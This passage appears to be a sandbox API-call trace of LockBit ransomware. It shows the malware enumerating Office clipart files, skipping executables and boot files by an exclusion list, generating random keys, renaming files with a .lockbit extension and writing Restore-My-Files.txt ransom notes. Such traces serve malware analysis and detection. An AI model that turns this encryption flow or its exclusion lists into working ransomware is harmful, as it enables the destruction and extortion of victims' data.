"c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107344.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.698] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.698] malloc (_Size=0x40068) returned 0x3df0008 [0141.698] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5076) returned 1 [0141.698] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.699] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.699] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.699] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.699] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.715] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.715] malloc (_Size=0xa6) returned 0x77d7a8 [0141.715] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.717] free (_Block=0x77d7a8) [0141.717] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107344.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.717] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.717] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.717] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5c78, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107350.WMF", cAlternateFileName="")) returned 1 [0141.717] lstrcmpiW (lpString1=".", lpString2="J0107350.WMF") returned -1 [0141.717] lstrcmpiW (lpString1="..", lpString2="J0107350.WMF") returned -1 [0141.717] PathFindExtensionW (pszPath="J0107350.WMF") returned=".WMF" [0141.717] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.717] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.717] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.717] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.717] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.717] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.718] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.718] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107350.WMF") returned 1 [0141.719] lstrcmpiW (lpString1="ntldr", lpString2="J0107350.WMF") returned 1 [0141.719] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107350.WMF") returned 1 [0141.719] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107350.WMF") returned -1 [0141.719] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107350.WMF") returned -1 [0141.719] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107350.WMF") returned 1 [0141.719] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107350.WMF") returned -1 [0141.719] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.719] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF") returned=".WMF" [0141.719] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.719] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.719] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.720] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.720] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF.lockbit") returned 72 [0141.720] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107350.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.722] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.722] malloc (_Size=0x40068) returned 0x3df0008 [0141.722] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=23672) returned 1 [0141.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.722] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.722] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.722] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.723] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.723] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.723] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.731] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.731] malloc (_Size=0xa6) returned 0x77d7a8 [0141.731] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.733] free (_Block=0x77d7a8) [0141.733] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107350.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.733] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.733] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.733] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107358.WMF", cAlternateFileName="")) returned 1 [0141.733] lstrcmpiW (lpString1=".", lpString2="J0107358.WMF") returned -1 [0141.733] lstrcmpiW (lpString1="..", lpString2="J0107358.WMF") returned -1 [0141.733] PathFindExtensionW (pszPath="J0107358.WMF") returned=".WMF" [0141.733] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.733] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.734] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.734] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107358.WMF") returned 1 [0141.735] lstrcmpiW (lpString1="ntldr", lpString2="J0107358.WMF") returned 1 [0141.735] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107358.WMF") returned 1 [0141.735] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107358.WMF") returned -1 [0141.735] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107358.WMF") returned -1 [0141.735] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107358.WMF") returned 1 [0141.735] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107358.WMF") returned -1 [0141.735] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.735] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF") returned=".WMF" [0141.735] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.735] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.735] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.736] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.736] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.736] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.736] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.736] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.736] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF.lockbit") returned 72 [0141.736] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107358.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.736] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.737] malloc (_Size=0x40068) returned 0x3df0008 [0141.737] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7964) returned 1 [0141.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.737] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.737] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.737] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.738] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.738] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.738] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.742] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.742] malloc (_Size=0xa6) returned 0x77d7a8 [0141.742] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0141.742] free (_Block=0x77d7a8) [0141.743] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107358.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.743] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.743] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.743] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x40cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107364.WMF", cAlternateFileName="")) returned 1 [0141.743] lstrcmpiW (lpString1=".", lpString2="J0107364.WMF") returned -1 [0141.743] lstrcmpiW (lpString1="..", lpString2="J0107364.WMF") returned -1 [0141.743] PathFindExtensionW (pszPath="J0107364.WMF") returned=".WMF" [0141.743] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.743] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.744] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.744] lstrcmpiW 